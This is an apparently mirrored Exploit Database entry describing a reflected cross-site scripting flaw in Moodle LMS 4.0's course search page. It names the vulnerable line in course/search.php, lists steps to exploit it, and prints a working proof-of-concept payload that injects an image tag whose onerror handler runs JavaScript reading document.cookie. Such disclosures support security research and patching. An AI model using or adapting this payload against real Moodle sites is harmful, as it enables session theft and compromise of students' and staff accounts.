Moodle LMS 4.0 – Cross-Site Scripting (XSS)

• Exploit Database
• 38 阅读

• 作者： Saud Alenazi
  日期： 2023-03-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51115/

• # Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting (XSS)
  # Date: 26/10/2022
  # Exploit Author: Saud Alenazi
  # Vendor Homepage: https://moodle.org/
  # Software Link: https://git.in.moodle.com/moodle
  # Version: 4.0
  # Tested on: XAMPP, Windows 10
  # Contact: https://twitter.com/dmaral3noz
  
  Description:
  
  A Cross Site Scripting (XSS) vulnerability exists in Moodle is a free and open-source Learning Management System (LMS) written in PHP and distributed under the GNU General Public License
  
  Vulnerable Code:
  
  line 111 in file "course/search.php"
  
  echo $courserenderer->search_courses($searchcriteria);
  
  
  Steps to exploit:
  1) Go to http://localhost/course/search.php
  2) Insert your payload in the "search"
  
  Proof of concept (Poc):
  The following payload will allow you to run the javascript -
  "><img src=# onerror=alert(document.cookie)>